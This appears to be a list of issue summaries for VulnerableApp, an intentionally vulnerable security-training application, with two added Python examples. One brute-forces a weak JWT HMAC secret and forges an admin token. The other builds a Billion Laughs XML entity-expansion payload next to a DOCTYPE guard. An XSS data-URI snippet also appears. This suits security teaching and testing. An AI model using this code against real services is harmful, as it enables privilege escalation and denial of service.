Karan Preet Singh Sasan
**Is your feature request related to a problem? Please describe.** Analyse the brute force attack with common passwords for JWT as per the following list: https://raw.githubusercontent.com/wallarm/jwt-secrets/master/jwt.secrets.list. Read more at https://lab.wallarm.com/meet-jwt-heartbreaker-a-burp-extension-that-finds-thousands-weak-secrets-automatically/...
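The attack the issue above asks to analyse, as an added example (not code from the issue, from VulnerableApp, or from the wallarm extension): an HS256 token is signed with a weak secret, every candidate from a wordlist is tried as the HMAC key against the token's signing input, and a hit is then used to forge a token with a modified payload. The token and the three-entry wordlist are constructed here; in practice the candidates would be read from the jwt.secrets.list file, for which `load_wordlist` assumes a local path.

```python
import base64
import hashlib
import hmac
import json

# Map of the HMAC "alg" values a JWT header may carry to hashlib constructors.
HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def b64url_encode(data: bytes) -> str:
    """JWT uses unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def sign_hmac(header: dict, payload: dict, secret: bytes) -> str:
    """Produce a compact JWS for an HMAC alg; used here both to build the sample and to forge."""
    digestmod = HMAC_ALGS[header["alg"]]
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode(), digestmod).digest()
    return signing_input + "." + b64url_encode(sig)


def brute_force_hmac_secret(token: str, candidates):
    """Return the first candidate whose HMAC over header.payload matches the token's signature, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    digestmod = HMAC_ALGS.get(header.get("alg"))
    if digestmod is None:
        # RSA/EC-signed (or "none") tokens have no shared secret to guess; do not waste the wordlist on them.
        raise ValueError("token alg is not an HMAC algorithm: %r" % header.get("alg"))
    signing_input = (header_b64 + "." + payload_b64).encode()
    expected = b64url_decode(sig_b64)
    for candidate in candidates:
        digest = hmac.new(candidate.encode(), signing_input, digestmod).digest()
        if hmac.compare_digest(digest, expected):
            return candidate
    return None


def load_wordlist(path: str):
    """Assumed on-disk copy of jwt.secrets.list, one secret per line (path is an assumption)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.rstrip("\n")
            if line:
                yield line


# Constructed sample: a token an application might issue, signed with the weak secret "secret".
SAMPLE_HEADER = {"alg": "HS256", "typ": "JWT"}
SAMPLE_PAYLOAD = {"sub": "1234567890", "name": "John Doe", "role": "user"}
SAMPLE_TOKEN = sign_hmac(SAMPLE_HEADER, SAMPLE_PAYLOAD, b"secret")

# Constructed stand-in for the real wordlist.
SAMPLE_WORDLIST = ["password", "secret", "changeme"]


def forge_admin_token(token: str, candidates) -> str:
    """Recover the secret, then re-sign the same header with an elevated payload."""
    secret = brute_force_hmac_secret(token, candidates)
    if secret is None:
        raise RuntimeError("secret not in wordlist")
    header_b64, payload_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload["role"] = "admin"
    return sign_hmac(json.loads(b64url_decode(header_b64)), payload, secret.encode())


if __name__ == "__main__":
    print("recovered secret:", brute_force_hmac_secret(SAMPLE_TOKEN, SAMPLE_WORDLIST))
    print("forged token:", forge_admin_token(SAMPLE_TOKEN, SAMPLE_WORDLIST))
```

The check that matters on the defending side is the one `brute_force_hmac_secret` exploits: an HMAC secret short enough to appear in a public wordlist is a password, not a key, so HS256 keys should be random and at least 256 bits, and the verifier should pin the expected `alg` rather than trusting the header.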
**Is your feature request related to a problem? Please describe.** Currently we do not have any unit tests, and hence regression is quite tough to handle. This task is an...
**Is your feature request related to a problem? Please describe.** As OWASP Juice Shop has "How I pwned the Juice Shop", similarly it is better if we have a similar...
For now we have supported standalone vulnerabilities, but when it comes to vulnerabilities like session fixation, CSRF etc., we need to think more on how we can introduce them in...
**Describe the bug** Validate the Billion Laughs attack for the [XXE vulnerability](https://github.com/SasanLabs/VulnerableApp/blob/master/src/main/java/org/sasanlabs/service/vulnerability/xxe/XXEVulnerability.java). There is some level that can have a Billion Laughs attack, but we have not tested it. There is a default...
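The payload the bug report above wants validated, as an added example (not code from the issue or from VulnerableApp): a generator for the nested-entity document, the arithmetic for how large the parser's expansion would be, and the guard a consumer applies before handing untrusted XML to a parser that honours DTDs. Entity names, the root element name and the size thresholds are choices made here, not anything the project uses.

```python
import re

LEAF = "lol"  # the text of the innermost entity; every expansion is a multiple of this


def billion_laughs(levels: int = 9, fanout: int = 10, root: str = "lolz") -> tuple[str, int]:
    """Build the classic payload: lol0 = "lol", lol{i} = fanout references to lol{i-1}.

    Returns the XML document and the number of bytes the parser would have to materialise
    when expanding &lol{levels}; (3 * fanout ** levels, since the leaf is 3 bytes).
    """
    entities = ['<!ENTITY lol0 "%s">' % LEAF]
    for i in range(1, levels + 1):
        body = "".join("&lol%d;" % (i - 1) for _ in range(fanout))
        entities.append('<!ENTITY lol%d "%s">' % (i, body))
    doc = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE %s [\n%s\n]>\n" % (root, "\n".join(entities))
        + "<%s>&lol%d;</%s>" % (root, levels, root)
    )
    return doc, len(LEAF) * fanout ** levels


def expanded_size_by_substitution(levels: int, fanout: int) -> int:
    """Independent check of the formula: actually expand the entities for small parameters."""
    text = LEAF
    for _ in range(levels):
        text = text * fanout
    return len(text)


# Guard for code that must parse untrusted XML with a DTD-aware parser: the attack needs an
# internal DTD, so reject any document that declares one. The 1 MiB cap is an assumed limit.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
MAX_XML_BYTES = 1024 * 1024


def is_safe_to_parse(xml: str, max_bytes: int = MAX_XML_BYTES) -> bool:
    """True only if the document carries no DOCTYPE and stays under the size cap."""
    if len(xml.encode("utf-8")) > max_bytes:
        return False
    return DOCTYPE_RE.search(xml) is None


if __name__ == "__main__":
    doc, size = billion_laughs()
    print(doc)
    print("payload is %d bytes on the wire, %d bytes once expanded" % (len(doc), size))
    print("safe to parse:", is_safe_to_parse(doc))
```

The on-the-wire payload is under a kilobyte, while the default ten-by-ten nesting expands to three gigabytes, which is why the fix belongs in parser configuration (disallowing DOCTYPE declarations, or a hard entity-expansion limit) rather than in input size limits alone.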
**Is your feature request related to a problem? Please describe.** The current implementation of the ZAP and VulnerableApp integration has a few issues related to scoring due to the different designs of both the...
While going through vulnerability descriptions, I found that they are not proper and need a revisit. Need to separate out where the value was found, i.e. cookie or URL or other...
**Is your feature request related to a problem? Please describe.** Adding Data URI based XSS, e.g. data:text/html,alert('hi'); **Describe the solution you'd like** As the XSS vulnerability is already there, it would...
**Is your feature request related to a problem? Please describe.** Currently we have added XSS, but that is only the use case of reflected XSS; there is no persistent XSS...
**Is your feature request related to a problem? Please describe.** There is one use case we got from https://github.com/zaproxy/zap-extensions/pull/2443 where untrusted input is part of a path param, so we need...